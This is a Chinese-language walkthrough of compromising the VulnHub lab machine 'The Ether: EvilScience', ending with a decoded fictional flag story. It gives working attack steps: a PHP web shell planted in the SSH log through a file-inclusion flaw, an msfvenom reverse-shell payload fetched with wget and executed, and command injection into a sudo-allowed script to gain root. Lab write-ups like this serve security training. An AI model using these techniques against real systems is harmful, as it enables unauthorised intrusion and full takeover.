靶机地址:https://www.vulnhub.com/entry/the-ether-evilscience,212

信息收集

靶机 ip 为:192.168.0.39

扫描靶机的全部信息:nmap -A -T4 192.168.0.39

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~# nmap -A -T4 192.168.0.39

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:C4:FE:6A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.03 ms 192.168.0.39

靶机只开放了 ssh 服务和 http 服务,先从 http 服务下手,访问 http://靶机IP

浏览该网站,发现该网站疑似存在文件包含漏洞

为了方便渗透,以下的操作都在 burpsuite 里面进行,开启代理抓包

根据上面的提示:只开启了 ssh 服务和 apache 的 http 服务,试试访问 apache 和 ssh 的日志文件

1
2
3
4
5
/var/log/apache/access.log
/var/log/apache2/access.log
/var/www/log/access.log
/var/log/secure
/var/log/auth.log

访问 ssh 日志文件的时候有回显,证实了该站点存在文件包含漏洞

开始渗透

利用 ssh 插入将命令执行代码插入到日志

先假装连接 ssh ,密码随便输,输入一次就可以继续,输太多次貌似会出问题

1
2
3
ssh '<?php @system($_GET[cmd]); ?>'@192.168.0.39
<?php @system($_GET[cmd]); ?>@192.168.0.39's password:
Permission denied, please try again.

返回 burp ,增加参数,看到 ls 命令列出目录列表成功了就表明我们的目的达到了,接下来是重头戏了

这里是利用 msf 进行渗透

先利用 msf 生成一个 linux 的木马(当然php的也可以),这里生成 linux 的木马是为了后续方便创建用户

1
msfvenom -p linux/x86/meterpreter/reverse_tcp lport=5555 lhost=192.168.0.42 -f elf > dest

在同目录下开启 http 服务

1
python -m SimpleHTTPServer 8000

获取反弹shell

1
2
3
?file=/var/log/auth.log&cmd=wget+http://192.168.0.42:8000/dest
特殊符号需要url编码,
url编码后:?file=/var/log/auth.log&cmd=wget+http%3a%2f%2f192.168.0.42%3a8000%2fdest

将编码后的参数放进请求头,Go一下

另开一个终端,设好参数,开启监听

给文件赋予执行权限,执行该文件返回shell

1
?file=/var/log/auth.log&cmd=chmod+%2bx+dest 
1
2
?file=/var/log/auth.log&cmd=./dest 

这里已经拿到 shell 了,图就懒得截了

提升权限

uname 命令查看内核版本,想起脏牛提权漏洞(dirtyCow)可能适用,

1
2
uname -a
Linux theEther 4.10.0-40-generic #44~16.04.1-Ubuntu SMP Thu Nov 9 15:33:07 UTC 2017 i686 i686 i686 GNU/Linux

将脏牛漏洞脚本上传到靶机后编译执行,没有反应。。。

1
2
g++ -std=c++11 -pthread -o dst dirtyCow.cpp -lutil
./dst

返回 shell ,发现有个可疑文件 sudo –list 发现该文件竟然有 root 执行权限

sudo 执行该脚本

再另外开启一个终端,进入 msf 开启监听,构造执行语句

1
2
sudo ./xxxlogauditorxxx.py
Load which log?: /var/log/auth.log|./dest

成功获得 root 权限的shell,这下可以”为所欲为”了

获取flag

切换到 root 目录发现有一张 flag.png ,

emm..图片好像没有什么

尝试筛选关键字符串的时候发现后面有一大段 base64 加密后的字符串

1
2
3
strings flag.png | grep flag

flag: b2N0b2JlciAxLCAyMDE3LgpXZSBoYXZlIG9yIGZpcnN0IGJhdGNoIG9mIHZvbHVudGVlcnMgZm9yIHRoZSBnZW5vbWUgcHJvamVjdC4gVGhlIGdyb3VwIGxvb2tzIHByb21pc2luZywgd2UgaGF2ZSBoaWdoIGhvcGVzIGZvciB0aGlzIQoKT2N0b2JlciAzLCAyMDE3LgpUaGUgZmlyc3QgaHVtYW4gdGVzdCB3YXMgY29uZHVjdGVkLiBPdXIgc3VyZ2VvbnMgaGF2ZSBpbmplY3RlZCBhIGZlbWFsZSBzdWJqZWN0IHdpdGggdGhlIGZpcnN0IHN0cmFpbiBvZiBhIGJlbmlnbiB2aXJ1cy4gTm8gcmVhY3Rpb25zIGF0IHRoaXMgdGltZSBmcm9tIHRoaXMgcGF0aWVudC4KCk9jdG9iZXIgMywgMjAxNy4KU29tZXRoaW5nIGhhcyBnb25lIHdyb25nLiBBZnRlciBhIGZldyBob3VycyBvZiBpbmplY3Rpb24sIHRoZSBodW1hbiBzcGVjaW1lbiBhcHBlYXJzIHN5bXB0b21hdGljLCBleGhpYml0aW5nIGRlbWVudGlhLCBoYWxsdWNpbmF0aW9ucywgc3dlYXRpbmcsIGZvYW1pbmcgb2YgdGhlIG1vdXRoLCBhbmQgcmFwaWQgZ3Jvd3RoIG9mIGNhbmluZSB0ZWV0aCBhbmQgbmFpbHMuCgpPY3RvYmVyIDQsIDIwMTcuCk9ic2VydmluZyBvdGhlciBjYW5kaWRhdGVzIHJlYWN0IHRvIHRoZSBpbmplY3Rpb25zLiBUaGUgZXRoZXIgc2VlbXMgdG8gd29yayBmb3Igc29tZSBidXQgbm90IGZvciBvdGhlcnMuIEtlZXBpbmcgY2xvc2Ugb2JzZXJ2YXRpb24gb24gZmVtYWxlIHNwZWNpbWVuIG9uIE9jdG9iZXIgM3JkLgoKT2N0b2JlciA3LCAyMDE3LgpUaGUgZmlyc3QgZmxhdGxpbmUgb2YgdGhlIHNlcmllcyBvY2N1cnJlZC4gVGhlIGZlbWFsZSBzdWJqZWN0IHBhc3NlZC4gQWZ0ZXIgZGVjcmVhc2luZywgbXVzY2xlIGNvbnRyYWN0aW9ucyBhbmQgbGlmZS1saWtlIGJlaGF2aW9ycyBhcmUgc3RpbGwgdmlzaWJsZS4gVGhpcyBpcyBpbXBvc3NpYmxlISBTcGVjaW1lbiBoYXMgYmVlbiBtb3ZlZCB0byBhIGNvbnRhaW5tZW50IHF1YXJhbnRpbmUgZm9yIGZ1cnRoZXIgZXZhbHVhdGlvbi4KCk9jdG9iZXIgOCwgMjAxNy4KT3RoZXIgY2FuZGlkYXRlcyBhcmUgYmVnaW5uaW5nIHRvIGV4aGliaXQgc2ltaWxhciBzeW1wdG9tcyBhbmQgcGF0dGVybnMgYXMgZmVtYWxlIHNwZWNpbWVuLiBQbGFubmluZyB0byBtb3ZlIHRoZW0gdG8gcXVhcmFudGluZSBhcyB3ZWxsLgoKT2N0b2JlciAxMCwgMjAxNy4KSXNvbGF0ZWQgYW5kIGV4cG9zZWQgc3ViamVjdCBhcmUgZGVhZCwgY29sZCwgbW92aW5nLCBnbmFybGluZywgYW5kIGF0dHJhY3RlZCB0byBmbGVzaCBhbmQvb3IgYmxvb2QuIENhbm5pYmFsaXN0aWMtbGlrZSBiZWhhdmlvdXIgZGV0ZWN0ZWQuIEFuIGFudGlkb3RlL3ZhY2NpbmUgaGFzIGJlZW4gcHJvcG9zZWQuCgpPY3RvYmVyIDExLCAyMDE3LgpIdW5kcmVkcyBvZiBwZW9wbGUgaGF2ZSBiZWVuIGJ1cm5lZCBhbmQgYnVyaWVkIGR1ZSB0byB0aGUgc2lkZSBlZmZlY3RzIG9mIHRoZSBldGhlci4gVGhlIGJ1aWxkaW5nIHdpbGwgYmUgYnVybmVkIGFsb25nIHdpdGggdGhlIGV4cGVyaW1lbnRzIGNvbmR1Y3RlZCB0byBjb3ZlciB1cCB0aGUgc3RvcnkuCgpPY3RvYmVyIDEzLCAyMDE3LgpXZSBoYXZlIGRlY2lkZWQgdG8gc3RvcCBjb25kdWN0aW5nIHRoZXNlIGV4cGVyaW1lbnRzIGR1ZSB0byB0aGUgbGFjayBvZiBhbnRpZG90ZSBvciBldGhlci4gVGhlIG1haW4gcmVhc29uIGJlaW5nIHRoZSBudW1lcm91cyBkZWF0aCBkdWUgdG8gdGhlIHN1YmplY3RzIGRpc3BsYXlpbmcgZXh0cmVtZSByZWFjdGlvbnMgdGhlIHRoZSBlbmdpbmVlcmVkIHZpcnVzLiBObyBwdWJsaWMgYW5ub3VuY2VtZW50IGhhcyBiZWVuIGRlY2xhcmVkLiBUaGUgQ0RDIGhhcyBiZWVuIHN1c3BpY2lvdXMgb2Ygb3VyIHRlc3RpbmdzIGFuZCBhcmUgY29uc2lkZXJpbmcgbWFydGlhbCBsYXdzIGluIHRoZSBldmVudCBvZiBhbiBvdXRicmVhayB0byB0aGUgZ2VuZXJhbCBwb3B1bGF0aW9uLgoKLS1Eb2N1bWVudCBzY2hlZHVsZWQgdG8gYmUgc2hyZWRkZWQgb24gT2N0b2JlciAxNXRoIGFmdGVyIFBTQS4K

将 base64 内容解密,得到一段故事…

不知为何,这个故事让我想起了当年的日本关东军为研究”细菌实验”进行过的毫无人性的”人体实验”